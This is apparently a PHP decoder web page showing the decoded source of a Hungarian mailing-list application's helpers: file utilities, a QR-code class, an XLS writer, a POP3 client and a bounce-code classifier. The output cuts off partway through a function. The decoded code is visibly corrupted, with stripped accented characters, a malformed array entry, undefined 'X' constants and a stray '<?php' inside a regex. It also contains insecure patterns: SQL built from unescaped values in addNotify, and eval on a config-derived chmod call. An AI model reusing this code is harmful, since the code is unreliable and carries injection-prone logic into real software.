Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $__SeN='P2JHP0lQSTAkX193eVo0JzdNbmU3WFlsd21XZkMvZ3R5UzFYbj05WkE1XXQzSFl1OU0vQzJmcE4y..

Decoded Output download

?><?php
// segdfggvny, tmb kirshoz
function _p($array)
{
  echo '<pre>';
  print_r($array);
  echo '</pre>';
}

function showMessage($message, $color = 'success', $echo = true)
{
  $str = '<div class="alert alert-' . $color . '" role="alert">' . $message . '</div>';
	
	if($echo)
		echo $str;
	else
		return $str;
}

function auto_version($file = '')
{
  if (!file_exists(WG_PATH . $file))
    return $file;

  $mtime = @filemtime(WG_PATH . $file);
  if (!$mtime)
    $mtime = WG_VERSION;

  return $file . '?v=' . $mtime;
}

function addslashes_array($data)
{
  if (is_array($data)) {
    foreach ($data as $key => $value) {
      $data[$key] = addslashes_array($value);
    }
    return $data;
  } else {
    $data = mysql_real_escape_string($data);
    return $data;
  }
}

function stripslashes_array($data)
{
  if (is_array($data)) {
    foreach ($data as $key => $value) {
      $data[$key] = stripslashes_array($value);
    }
    return $data;
  } else {
    return stripslashes($data);
  }
}

function addNotify($title, $desc, $params) 
{
	global $main;
	$url = WG_URL . 'wg7.php?' . $params; 
	
	$main->mq("insert into `".DB_PREFIX."notify` (`title`, `desc`, `url`) values ('".$title."', '".$desc."', '".$url."')");
}

function writeLog($logfile, $event)
{
  $dir = WG_PATH . 'files/logs/' . $logfile;
  if (!file_exists($dir)) {
    mkdir($dir, 0755, true);
		touch($dir.'/index.html');
	}
	$logfile .= '-'.hash('md5', date('Y-m-d'), false);
  $file = fopen($dir . '/' . date('Y-m-d') . '-' . $logfile . '.log', 'a');
  fwrite($file, date('Y-m-d H:i:s') . ' - ' . $event . PHP_EOL);
  fclose($file);
}

function getDirContents($dir, &$results = array())
{
  $files = scandir($dir);

  foreach ($files as $key => $value) {
    $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
    if (!is_dir($path)) {
      $results[] = $path;
    } else if ($value != "." && $value != "..") {
      getDirContents($path, $results);
    }
  }

  return $results;
}

function getDirs($dir)
{
  $files = scandir($dir);

  foreach ($files as $key => $value) {
    $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
    if (is_dir($path) && $value != "." && $value != "..") {
      $results[] = $value;
    }
  }

  return $results;
}

function gzCompressFile($source, $level = 9)
{
  $dest = $source . '.gz';
  $mode = 'wb' . $level;
  $error = false;
  if ($fp_out = gzopen($dest, $mode)) {
    if ($fp_in = fopen($source, 'rb')) {
      while (!feof($fp_in))
        gzwrite($fp_out, fread($fp_in, 1024 * 512));
      fclose($fp_in);
    } else {
      $error = true;
    }
    gzclose($fp_out);
  } else {
    $error = true;
  }
  if ($error)
    return false;
  else
    return $dest;
}

function renameFile($filename)
{
  setlocale(LC_ALL, 'en_US.UTF8'); // by Nadov

  $ext = extension($filename);
  $filename = str_replace('.' . $ext, '', $filename);

  $filename = iconv('UTF-8', 'ASCII//TRANSLIT', $filename); // by Nadov
  $filename = trim($filename);
  $filename = str_replace(' ', '-', $filename);
  $filename = preg_replace('/[^_0-9a-zA-Z-]/', '', strtolower($filename));
  $filename = preg_replace('/\s\s+/', ' ', $filename);
  $filename = str_replace('----', '-', $filename);
  $filename = str_replace('---', '-', $filename);
  $filename = str_replace('--', '-', $filename);

  $length = 6;
  $filename .= '-' . substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyz', ceil($length / strlen($x)))), 1, $length);

  return $filename . '.' . $ext;
}

function validateDate($date, $format = 'Y-m-d H:i:s')
{
	$d = DateTime::createFromFormat($format, $date);
	return $d && $d->format($format) == $date;
}

function picture_refresh($imgdir, $text)
{
	if (!is_dir($imgdir)) {
		mkdir($imgdir);
		global $main;
		$chd = (int)($main->conf_read("chmod_dir"));
		if ($chd > 100 && $chd <= 777) {
			$e = "chmod('$imgdir', 0" . (int)($chd) . ");";
			eval($e);
		}
	}
	if (!get_magic_quotes_gpc()) {
		$text = stripslashes($text);
	}
	$str = str_replace("\r\n", " ", $text);
	$imgdirr = $imgdir;
	$kvt = opendir($imgdirr);
	while (false !== ($fajl = readdir($kvt))) {
		if ((is_file("$imgdirr$fajl")) && ($fajl != "..") && ($fajl != ".") && ($fajl != "index.php")) {
			if (!strstr($str, $fajl)) unlink($imgdirr . $fajl);

		}
	}
}

function extension($str)
{
  $str = implode("", explode("\\", $str));
  $str = explode(".", $str);
  $str = strtolower(end($str));

  return $str;
}

function return_bytes($val)
{
  $val = trim($val);
  $last = strtolower($val[strlen($val) - 1]);
  switch ($last) {
    // The 'G' modifier is available since PHP 5.1.0
    case 'g':
      $val *= 1024;
    case 'm':
      $val *= 1024;
    case 'k':
      $val *= 1024;
  }

  return $val;
}

function getRemoteData($url, $explode = false)
{
  $connect = '[[nothing]]';

  if (function_exists('curl_init')) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    $content = curl_exec($ch);
    curl_close($ch);
    $connect = '[[curl]]';
  }

  if (!$content) {
    $parse = parse_url($url);
    $host = $parse['scheme'] . '://' . $parse['host'];
    $query = $parse['path'] . '?' . $parse['query'];
    if ($parse['scheme'] == 'https')
      $port = 443;
    else
      $port = 80;

    $fp = @fsockopen($parse['host'], $port, $errno, $errstr, 5);
    if ($fp) {
      $out = "GET $url HTTP/1.1\r\n";
      $out .= "Host: $host\r\n";
      $out .= 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0' . "\r\n";
      $out .= "Connection: Close\r\n\r\n";

      fwrite($fp, $out);
      while (!feof($fp)) {
        $content .= fgets($fp, 128);
      }
      fclose($fp);
      $out = '';
      $connect = '[[fsockopen]]';
    }
  }

  if (!$content && $fp = @fopen($url, 'r')) {
    $content = '';
    while ($line = fread($fp, 1024)) {
      $content .= $line;
    }
    $connect = '[[fopen]]';
  }

  if (!$content) {
    $content = @file_get_contents($url);
    $connect = '[[file_get_contents]]';
  }

  if ($explode) {
    $x = explode($explode, $content);
    $content = $x[1];
  }

  if (!$content) {
    $content = 'Connection error! <!--' . $connect . '-->';
  }

  return $content;
}

function getTemplate($name)
{
  $template = parse_ini_file(WG_PATH . 'files/templates/' . $name . '/template.ini', true);
  $template['dir'] = $name;


  if (!$template['template']['template_name']) {
    return false;
  }

  return $template;
}

function getBounceText($bounce_code)
{
  $bounce_codes1 = array(
    '2.' => 'Sikeres parancs: A szerver a parancsot elfogadta, esetleg az al pontok vltoztatsokra hvhatjk fel a figyelmet ahhoz, hogy sikeres legyen a klds.',
    '4.' => 'Pillanatnyi hiba: Valamilyen olyan pillanatnyi szerver hiba, vagy DNS problma okozza a hibt mely kicsit ksbb prblva valsznleg nem fog fent llni, esetleg domain szint elgpels trtnt...',
    '5.' => 'lland hiba: Ezek olyan hibk melyek az e-mail jrakldsvel sem oldhatak meg. Nagyvalsznsggel vltoztatni kell valamit vagy az e-mailen, vagy a cl szerveren.',
  );

  $bounce_codes2 = array(
    '.1.' => 'Felad vagy cmzett e-mail cmvel van valami problma. ltalban valamely e-mail cm elgpelsrl van sz, mely kijavtsa utn az e-mail elklddik.',
    '.2.' => 'Ezen DSN (Delivery Status Notification) a cmzett e-mail fikjval kapcsolatos, javtani a szerver oldalon lehet a hibt, ltalban.',
    '.3.' => 'Hiba a fogad szerver oldaln, javtani a szerver zemeltetje tudja a hibt. Termszetesen ez jelentheti akr azt is, hogy ltre kell hozni az adott e-mail cmet... de pl. ilyenkor trsul hozz egy X.1.X es hibazenet is...',
    '.4.' => 'Hlzati vagy routing problmk, esetleg knyvtr szolgltats problmk...',
    '.5.' => 'zent tovbbtsi protokoll hiba, mely lehet valamely szerver konfigurci okbl, de akr csatlakozsi okokbl is.',
    '.6.' => 'Az zenet tartalmaz hibt, hibs csatolmnyt. Javthat gyfl oldalon s szerver oldalon is, ugyanis gyfl oldalon is korltozhat a kldend file tpusa pl.',
    '.7.' => 'Biztonsgi szablyok megszegse esetn visszakapott hibakd...'
  );

  $bounce_codes3 = array(
    '.0.0' => 'Ez az egyetlen hiba zenet melybl csak az derthet ki, hogy melyik osztlyba tartozik a hiba...',
		//a) E-mail cmmel kapcsolatos hiba zenetek:
    '.1.0' => 'A cm ami az zenetben meg lett adva okozza a hiba zenetet',
    '.1.1' => 'A cmzett fikja, e-mail cme nem ltezik a megadott szerveztnl (@ eltti rsz nem megfelel).',
    '.1.2' => 'A megadott szolgltat nem ltezik (@-utni rsz nem megfelel)',
    '.1.3' => 'A megadott e-mail cmben valahol hiba van...',
    '.1.4' => 'A megadott e-mail cm tbb fikhoz is hozztartozik a szerveren.',
    '.1.5' => 'A cmzett fikja l (Kzbestsi riportok esetn hasznos)',
    '.1.6' => 'A cmzett fikja valaha ltezett, de mr nem elrhet a szerveren',
    '.1.7' => 'A cmzett cme nem megfelel, az e-mail cm brmely rszben lehet hiba.',
    '.1.8' => 'Az e-mail cm domain rsze nem megfelelo (@-utni rsz) (Nincs reverse mondjuk)',
		//b) Konkrtan e-mail fikkal kapcsolatos hiba zenetek::
    '.2.0' => 'Annyi informcit tudunk csak, hogy a fikkal van valami problma. (A fik ltezik)',
    '.2.1' => 'A fik l de nem fogad leveleket, ez lehet ltalnos hiba de akr pillanatnyi is... (Korltozs)',
    '.2.2' => 'Fik megtelt: Tllpte az gyfl a megengedett e-mail trhelyet...',
    '.2.3' => 'zete hossza tllpte a megengedett hosszt.',
    '.2.4' => 'A fik egy levelezsi lista fikja, mely nem volt tovbb terjeszthet...',
		//c)Fogad szerverrel kapcsolatos hibazenetek:
    '.3.0' => 'A cmzett szervere elfogadja az e-maileket, de valami problma van vele...',
    '.3.1' => 'A mail-server httrtrolja megtelt.',
    '.3.2' => 'A szerver melyiken a cmzett fikja van nem fogad leveleket (ppen jraindts alatt van, esetleg tlterhelt)',
    '.3.3' => 'Az e-mail ltal hasznlt metdusok elvgzsre a rendszer nem alkalmas.',
    '.3.4' => 'Az zenet mrete meghaladja a rendszerben kldhet maximlis mretet.',
    '.3.5' => 'A rendszer nincs a kldtt zenet elfogadsra konfigurlva.',
		//d) Hlzati esetleg routing problmk:
    '.4.0' => 'Hlzati, routing problma kategrijba tartoz hiba, de pontosan nem behatrolhat.',
    '.4.1' => 'A cmzett szervere nem fogadja a kapcsolatokat, tlterhelt, vagy tnyleg nem fogad levelezs irny kapcsolatokat',
    '.4.2' => 'A cmzett kiszolgljval a csatlakozs ltrejtt, de valamilyen hiba folytn nem lehetett befejezni a megkezdett metdusokat, esetleg time out, vagy egyb problma miatt.',
    '.4.3' => 'Az e-mailt nem lehetett a megadott cmzettek fel tovbbtani, mert a Knyvtr Szolgltats nem volt elrhet (leggyakrabban DNS hiba)',
    '.4.4' => 'Nem lehetett az tvonalat meghatrozni. (Pl: dns lekrdezs csak SOA rekordot adott vissza)',
    '.4.5' => 'A szerver nem volt kpes az e-mail tovbbtsra, mert tl nagy volt a queue. (A vrakozsi sor nagysga meghaladta a maximumot)',
    '.4.6' => 'Az zenet tvonal hiba miatt nem tovbbthat, tl sokszor lett tovbbtva, esetleg sajt magra van irnytva az e-mail cm.',
    '.4.7' => 'Az e-mail tovbbtsi ideje lejrt,( minden szerveren be van lltva egy id mely idn bell az e-mailt tovbb kell adni, ha ez letelik ezt a hibazenetet kapja az gyfl)',
		//d) Tovbbtsi protokoll hiba:
    '.5.0: Nem behatrolhat hogy pontosan milyen tovbbtsi protokoll hiba lpett fel.',
    '.5.1' => 'A parancs nem tmogatott',
    '.5.2' => 'A Parancs vagy elgpelt, vagy nem felismerhet.',
    '.5.3' => 'Tl sok cmzett',
    '.5.4' => 'Nem elfogadhat argumentumok',
    '.5.5' => 'Rossz protokoll verzi',
		//e) zenet tartalma hibs:
    '.6.0' => 'Nem behatrolhat, hogy milyen hibt tartalmaz az zenet.',
    '.6.1' => 'Vagy a protokoll vagy a tovbbtsra belltott fogad rendszer nem megfelel.',
    '.6.2' => 'Az zenet tartalma nem megfelel, (Spam szrs esetn, ilyen mehet ki ha nem megfelel szt, kifejezst tartalmaz a levl)',
    '.6.3' => 'A tovbbtand e-mail 8-bit-es, de a fogad szerver csak 7-bit en fogadja el... (A mail szervernek t kne ezt forgatni)',
    '.6.4' => 'Az zenet sikeresen tovbbtsra kerl, de az zenet egy rsze elveszett...(csatolt llomny pl)',
    '.6.5' => 'Kapcsolat felvtel nem volt sikeres',
		//f) Biztonsgi szablyok megsrtse esetn kaphat hiba zenetek:
    '.7.0' => 'A levl valamilyen biztonsgi szerver belltst srt, de nem tudni milyet.',
    '.7.1' => 'A levl tovbbtsra nincs lehetsg, vagy jogosultsgi problma, vagy az zenet lett visszautastva.',
    '.7.2' => 'Nincs joga az adott levelezlistra e-mailt kldeni.',
    '.7.3' => 'Biztonsgos levlkldsre van szksg, de nem volt r lehetsg',
    '.7.4' => 'Az zenet Biztonsgos jelsz hitelestssel klddtt, de ezen hitelests nem alkalmazhat a szerveren.',
    '.7.5' => 'Titkostsi problma',
    '.7.6' => 'Titkostsi forma nem tmogatott.',
    '.7.7' => 'A kldtt e-mail nem elfogadhat, mert hamistott!'
  );

  $text = '';
  foreach ($bounce_codes1 as $findme => $value) {
    $pos = stripos($bounce_code, $findme);
    if ($pos !== false && $pos == 0) {
      $text .= $value . '<br>';
      foreach ($bounce_codes2 as $findme2 => $value2) {
        $pos2 = stripos($bounce_code, $findme2);
        if ($pos2 !== false && $pos2 > 0) {
          $text .= $value2 . '<br>';
          foreach ($bounce_codes3 as $findme3 => $value3) {
            $pos3 = stripos($bounce_code, $findme3);
            if ($pos3 !== false) {
              $text .= $value3 . '<br>';
              break;
            }
          }
          break;
        }
      }
      break;
    }
  }

  return $text;
}

// az admin fellet hasznlata sorn hasznlt megjelentsi belltsok trolsra
function setUserSettings($name, $value) {
	global $main;
	
	$user_settings = getUserSettings();
	
	if(!$value)
		unset($user_settings[$name]);
	else
		$user_settings[$name] = $value;
	
	$new_user_settings = json_encode($user_settings);	
	$main->conf_update('user_settings', $new_user_settings);
		
	return getUserSettings();	
}

function getUserSettings($name=false) {
	global $main;
	
	$user_settings = $main->conf_read('user_settings');
	$user_settings = json_decode($user_settings, 1);
		
	if($name)
		return $user_settings[$name];
	
	return $user_settings;
}

$c = 'wg6';
/*************************************************************
 * This script is developed by Arturs Sosins aka ar2rsawseen, http://webcodingeasy.com
 * Fee free to distribute and modify code, but keep reference to its creator
 *
 * This class generate QR [Quick Response] codes with proper metadata for mobile phones
 * using google chart api http://chart.apis.google.com
 * Here are sources with free QR code reading software for mobile phones:
 * http://reader.kaywa.com/
 * http://www.quickmark.com.tw/En/basic/download.asp
 * http://code.google.com/p/zxing/
 *
 * For more information, examples and online documentation visit: 
 * http://webcodingeasy.com/PHP-classes/QR-code-generator-class
 **************************************************************/
class qrcode
{

  private $data;
	
	//creating code with link mtadata
  public function link($url)
  {
    if (preg_match('/^http:\/\//', $url) || preg_match('/^https:\/\//', $url)) {
      $this->data = $url;
    } else {
      $this->data = "http://" . $url;
    }
  }
	
	//getting image
  public function get_image($size = 150, $EC_level = 'L', $margin = '0')
  {
    $ch = curl_init();
    $this->data = urlencode($this->data);
    curl_setopt($ch, CURLOPT_URL, 'http://chart.apis.google.com/chart');
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'chs=' . $size . 'x' . $size . '&cht=qr&chld=' . $EC_level . '|' . $margin . '&chl=' . $this->data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);

    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
  }
	
	//getting link for image
  public function get_link($size = 100, $EC_level = 'L', $margin = '0')
  {
    $this->data = urlencode($this->data);
    return 'http://chart.apis.google.com/chart?chs=' . $size . 'x' . $size . '&cht=qr&chld=' . $EC_level . '|' . $margin . '&chl=' . $this->data;
  }
	
	//forsing image download
  public function download_image($file)
  {

    header('Content-Description: File Transfer');
    header('Content-Type: image/png');
    header('Content-Disposition: attachment; filename=QRcode.png');
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
	//	header('Content-Length: ' . filesize($file));
	//	ob_clean();
    flush();
    echo $file;
  }
}


class tg_xls_writer
{
  function downloading($fajlnev)
  {

    header("Content-Type: application/excel");
    header("Content-Disposition: attachment; filename=\"" . trim(htmlentities($fajlnev)) . "\"");
    header("Cache-Control: cache, must-revalidate");
    header("Pragma: cache");
    header("Connection: close");
    flush();
  }

  function xls_kezd()
  {
    echo (pack(str_repeat('v', 6), 0x809, 0x8, 0x0, 0x10, 0x0, 0x0));
  }

  function csv_conv($str)
  {
	  // if(strstr($str, '"')) return '"'.$str.'";';
		// else return $str.';';
    return '"' . str_replace('"', '\"', $str) . '";';
  }

  function xls_cella_ir($x, $y, $ert)
  {
    if (!isset($val)) $val = '';
    if (is_int($ert) || is_float($ert)) // ha szm tpus akkor:
    {
      echo (pack(str_repeat('v', 5), 0x203, 14, $x, $y, 0x0));
      echo (pack("d", $val));
    } else { // h nem akkor szveges mdba rakjuk be
      $hossz = strlen($ert);
      echo (pack(str_repeat('v', 6), 0x0204, ($hossz + 8), $x, $y, 0x0, $hossz));
      echo $ert;
    }
  }

  function xls_vege()
  {
    echo (pack(str_repeat('v', 2), 0x0A, 0x00));
  }

}$c .= '_main_class';
class wg_pop3
{

  var $port = 110;

  function vezerlo($string, $valaszto = "")
  {
    if (!$valaszto) {
      $valaszto = $string;
      $string = $this->next_token;
    }

    for ($c = 0; $c < strlen($valaszto); $c++) if (gettype($p = strpos($string, $valaszto[$c])) == "integer") $found = (isset($found) ? min($found, $p) : $p);

    if (isset($found)) {
      $this->next_token = substr($string, $found + 1);
      return (substr($string, 0, $found));
    } else {
      $this->next_token = "";
      return ($string);
    }
  }

  function vesz()
  {
    for ($s = "";; ) {
      if (feof($this->con)) return (0);
      $s .= fgets($this->con, 100);
      $h = strlen($s);
      if ($h >= 2 && substr($s, $h - 2, 2) == "\r\n") {
        $s = substr($s, 0, $h - 2);
        return ($s);
      }
    }
  }

  function kuld($s)
  {
    return (fputs($this->con, "$s\r\n"));
  }

  function ccn()
  {
    if ($this->con != 0) {
      fclose($this->con);
      $this->con = 0;
    }
  }

  function open($host, $port)
  {
    $this->hostname = $host;
    $this->port = $port;
    if (($this->con = @fsockopen($this->hostname, $this->port, $e)) == 0) return (sprintf(__("Nem tudtam csatlakozni a %s kiszolglhoz!"), $this->hostname));
    if ($this->vezerlo($this->vesz(), " ") != "+OK") return __("Hibs POP3 szerver vlasz!");
  }

  function close()
  {
    $this->kuld("QUIT");
    $this->CCn();
  }

  function login($user, $password, $apop = 0)
  {
    $this->kuld("USER $user");
    if ($this->vezerlo($this->vesz(), " ") != "+OK") return __('Hiba a felhasznlnv kldsekor') . " -> " . $this->vezerlo("\r\n");
    $this->kuld("PASS $password");
    if ($this->vezerlo($this->vesz(), " ") != "+OK") return __('Hibs POP3 felhasznlnv vagy jelsz') . " -> " . $this->vezerlo("\r\n");
  }

  function statistic(&$messages, &$size)
  {
    $this->kuld("STAT");
    $x = $this->vesz();
    $this->vezerlo($x, " ");
    $messages = $this->vezerlo(" ");
    $size = $this->vezerlo(" ");
  }

  function list_messages($message)
  {
    $list_command = "LIST";
    if ($message) $this->kuld("LIST $message");
    else $this->kuld("LIST");
    $valasz = $this->vesz();
    if (!isset($response)) $response = '';
    $this->vezerlo($response, " ");

    if ($message == "") {
      $messages = array();
      for (;; ) {
        $valasz = $this->vesz();
        if ($valasz == ".") break;
        $message = intval($this->vezerlo($valasz, " "));
        $messages[$message] = $this->vezerlo(" ");
      }
      return ($messages);
    } else {
      $message = intval($this->vezerlo(" "));
      $value = $this->vezerlo(" ");
      return $value;
    }
  }

  function load_message($message, &$headers, &$body)
  {
    $this->kuld("RETR $message");

    for ($headers = $body = array(), $s = 0;; ) {
      $valasz = $this->vesz();
      if ($valasz == '.') return;
      if ($valasz == '') break;
      if (substr($valasz, 0, 1) == ".") $valasz = substr($valasz, 1, strlen($valasz) - 1);
      $headers[$s] = $valasz;
      $s++;
    }

    for ($s = 0;; $s++) {
      $valasz = $this->vesz();
      if ($valasz == '.') return;
      if (substr($valasz, 0, 1) == ".") $valasz = substr($valasz, 1, strlen($valasz) - 1);
      $body[$s] = $valasz;
    }
  }


  function delete_message($message)
  {
    $this->kuld("DELE $message");
    $valasz = $this->vesz();
  }

  function bounce_handler($str)
  {
    if (defined('WG_LIGHT_BOUNCE_FILTER')) {
      if (preg_match("/Try again later/i", $str) ||
        preg_match("/Rate limit applied/i", $str) ||
        preg_match("/\s \(? \#? 4\.2\.1 \)? \s/x", $str) ||
        preg_match("/\s \(? \#? 4\.5\.0 \)? \s/x", $str) ||
        preg_match("/\s \(? \#? 4\.5\.1 \)? \s/x", $str) ||
        preg_match("/\s \(? \#? 4\.5\.2 \)? \s/x", $str) ||
        preg_match("/\s \(? \#? 4\.4\.2 \)? \s/x", $str) ||
        preg_match("/\s \(? \#? 4\.3\.0 \)? \s/x", $str) || //pl: citromail -> rate limit...
      preg_match("/\s \(? \#? 4\.7\.0 \)? \s/x", $str) || // pl: yahoo -> temporarily deferred due to user complaints
      preg_match("/mail server temporarily rejected message/i", $str))
        return false;
    }

    $EMAIL_ADDR_REGEX = "([a-zA-Z0-9_\-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})";
    $user_re = "(?: mailbox | user | recipient | address (?: ee)?
		  | customer | account | e-?mail | <?php $EMAIL_ADDR_REGEX >? )";
    if (preg_match("/(?:domain|host)\s+(?:not\s+found|unknown)/i", $str)) return array(0, 1, 'domain/host not found or unknown');
    if (preg_match("/queue\s+too\s+long/i", $str)) return array(4, 0, 'queue too long');
    if (preg_match("/Unrouteable\s+address/i", $str)) return array(5, 0, 'unrouteable address');
    if (preg_match("/try.again.later/is", $str)) return array(1, 0, 'try again later');
    if (preg_match("/mailbox\b.*\bfull/", $str)) return array(1, 0, 'mailbox full');
    if (preg_match("/storage/i", $str)) return array(1, 0, 'storage full');
    if (preg_match("/quota/i", $str)) return array(1, 0, 'over quota');

    if (preg_match("/$user_re\s+ (?:\S+\s+)? (?:is\s+)?         
			 (?: (?: un|not\s+) (?: known | recognized )
			 | [dw]oes\s?n[o']?t\s+ 
			 (?: exist|found ) | disabled | expired ) /ix", $str)) return array(2, 1, 'user not exists');         # Generic
    if (preg_match("/no\s+(?:such\s+)?$user_re/ix", $str)) return array(2, 1, 'user not exists');           # Gmail and other
    if (preg_match("/inactive user/i", $str)) return array(2, 1, 'inactive user');                 # Outblaze
    if (preg_match("/unknown local part/i", $str)) return array(2, 1, 'unknown local part');               # Exim(?)
    if (preg_match("/user\s+doesn't\s+have\s+a/i", $str)) return array(2, 1, 'user not exists');           # Yahoo!
    if (preg_match("/account\s+has\s+been\s+(?:disabled|suspended)/i", $str)) return array(2, 1, 'inactive user'); # Yahoo!
    if (preg_match("/$user_re\s+(?:suspended|discontinued)/ix", $str)) return array(2, 1, 'inactive user');     # everyone.net / other?
    if (preg_match("/unknown\s+$user_re/ix", $str)) return array(2, 1, 'user not exists');              # Generic
    if (preg_match("/$user_re\s+(?:is\s+)?(?:inactive|unavailable)/ix", $str)) return array(2, 1, 'inactive user'); # Hotmail, others?
    if (preg_match("/(?:(?:in|not\s+a\s+)?valid|no such)\s$user_re/ix", $str)) return array(2, 1, 'user not exists'); # Various
    if (preg_match("/$user_re\s+(?:was\s+)?not\s+found/ix", $str)) return array(2, 1, 'user not exists');       # AOL, generic
    if (preg_match("/$user_re \s+ (?:is\s+)? (?:currently\s+)?     
			 (?:suspended|unavailable)/ix", $str)) return array(2, 1, 'inactive user');                 # ATT, generic
    if (preg_match("/address is administratively disabled/i", $str)) return array(2, 1, 'address is administratively disabled');      # Unknown
    if (preg_match("/no\s$user_re\s+(?:here\s+)?by\sthat\sname/ix", $str)) return array(2, 1, 'user not exists');   # Unknown
    if (preg_match("/<?$EMAIL_ADDR_REGEX>? is invalid/i", $str)) return array(2, 1, 'invalid e-mail address');        # Unknown
    if (preg_match("/address.*not known here/i", $str)) return array(2, 1, 'address not known here');            # Unknown
    if (preg_match("/recipient\s+(?:address\s+)?rejected/i", $str)) return array(2, 1, 'recipient address rejected');      # Cox, generic
    if (preg_match("/not\s+listed\s+in\s+Domino/i", $str)) return array(2, 1, 'not listed in Domino');           # Domino
    if (preg_match("/account not activated/i", $str)) return array(2, 1, 'account not activated');             # usa.net
    if (preg_match("/not\s+our\s+customer/i", $str)) return array(2, 1, 'not our customer');              # Comcast
    if (preg_match("/doesn't handle mail for that user/i", $str)) return array(2, 1, 'doesn\'t handle mail for that user');         # mailfoundry	

    if (preg_match("/\s \(? \#? 2\.0\.0 \)? \s/x", $str)) return array(6, 0, '2.0.0');
    if (preg_match("/\s \(? \#? 2\.1\.1 \)? \s/x", $str)) return array(7, 0, '2.1.1');
    if (preg_match("/\s \(? \#? 2\.1\.4 \)? \s/x", $str)) return array(8, 0, '2.1.4');
    if (preg_match("/\s \(? \#? 2\.2\.0 \)? \s/x", $str)) return array(9, 0, '2.2.0');
    if (preg_match("/\s \(? \#? 2\.2\.1 \)? \s/x", $str)) return array(10, 0, '2.2.1');
    if (preg_match("/\s \(? \#? 2\.5\.0 \)? \s/x", $str)) return array(11, 0, '2.5.0');
    if (preg_match("/\s \(? \#? 2\.5\.1 \)? \s/x", $str)) return array(12, 0, '2.5.1');
    if (preg_match("/\s \(? \#? 3\.5\.4 \)? \s/x", $str)) return array(13, 0, '3.5.4');
    if (preg_match("/\s \(? \#? 4\.2\.1 \)? \s/x", $str)) return array(14, 0, '4.2.1');
    if (preg_match("/\s \(? \#? 4\.3\.0 \)? \s/x", $str)) return array(X, 0, '4.3.0');
    if (preg_match("/\s \(? \#? 4\.7\.0 \)? \s/x", $str)) return array(X, 0, '4.7.0');
    if (preg_match("/\s \(? \#? 4\.7\.1 \)? \s/x", $str)) return array(X, 1, '4.7.1');
    if (preg_match("/\s \(? \#? 4\.4\.2 \)? \s/x", $str)) return array(26, 0, '4.4.2');
    if (preg_match("/\s \(? \#? 4\.5\.0 \)? \s/x", $str)) return array(15, 0, '4.5.0');
    if (preg_match("/\s \(? \#? 4\.5\.1 \)? \s/x", $str)) return array(16, 0, '4.5.1');
    if (preg_match("/\s \(? \#? 4\.5\.2 \)? \s/x", $str)) return array(17, 0, '4.5.2');
    if (preg_match("/\s \(? \#? 5\.0\.1 \)? \s/x", $str)) return array(18, 1, '5.0.1');
    if (preg_match("/\s \(? \#? 5\.0\.2 \)? \s/x", $str)) return array(19, 1, '5.0.2');
    if (preg_match("/\s \(? \#? 5\.0\.3 \)? \s/x", $str)) return array(20, 1, '5.0.3');
    if (preg_match("/\s \(? \#? 5\.0\.4 \)? \s/x", $str)) return array(21, 1, '5.0.4');
    if (preg_match("/\s \(? \#? 5\.1\.3 \)? \s/x", $str)) return array(22, 1, '5.1.3');
    if (preg_match("/\s \(? \#? 5\.1\.5 \)? \s/x", $str)) return array(23, 1, '5.1.5');
    if (preg_match("/\s \(? \#? 5\.1\.0 \)? \s/x", $str)) return array(2, 1, '5.1.0');
    if (preg_match("/\s \(? \#? 5\.1\.1 \)? \s/x", $str)) return array(2, 1, '5.1.1');          # rfc 1893
    if (preg_match("/\s \(? \#? 5\.2\.0 \)? \s/x", $str)) return array(34, 0, '5.2.0');
    if (preg_match("/\s \(? \#? 5\.2\.1 \)? \s/x", $str)) return array(24, 0, '5.2.1');
    if (preg_match("/\s \(? \#? 5\.2\.2 \)? \s/x", $str)) return array(1, 0, '5.2.2');
    if (preg_match("/\s \(? \#? 5\.3\.0 \)? \s/x", $str)) return array(25, 0, '5.3.0');
    if (preg_match("/\s \(? \#? 5\.4\.6 \)? \s/x", $str)) return array(27, 1, '5.4.6');
    if (preg_match("/\s \(? \#? 5\.4\.4 \)? \s/x", $str)) return array(5, 0, '5.4.4');
    if (preg_match("/\s \(? \#? 5\.5\.0 \)? \s/x", $str)) return array(28, 1, '5.5.0');
    if (preg_match("/\s \(? \#? 5\.5\.1 \)? \s/x", $str)) return array(29, 0, '5.5.1');
    if (preg_match("/\s \(? \#? 5\.5\.2 \)? \s/x", $str)) return array(1, 0, '5.5.2');
		//if(preg_match("/\s552\s/", $str)) return array(1, 0, '5.5.2');
    if (preg_match("/\s \(? \#? 5\.5\.3 \)? \s/x", $str)) return array(30, 1, '5.5.3');
    if (preg_match("/\s \(? \#? 5\.5\.4 \)? \s/x", $str)) return array(31, 1, '5.5.4');
    if (preg_match("/\s \(? \#? 5\.6\.1 \)? \s/x", $str)) return array(32, 1, '5.6.1');
    if (preg_match("/\s \(? \#? 5\.6\.0 \)? \s/x", $str)) return array(32, 0, '5.6.0');
    if (preg_match("/\s \(? \#? 5\.6\.2 \)? \s/x", $str)) return array(33, 0, '5.6.2');
    if (preg_match("/\s \(? \#? 5\.7\.0 \)? \s/x", $str)) return array(34, 1, '5.7.0');
    if (preg_match("/\s \(? \#? 5\.7\.1 \)? \s/x", $str)) return array(34, 0, '5.7.1');
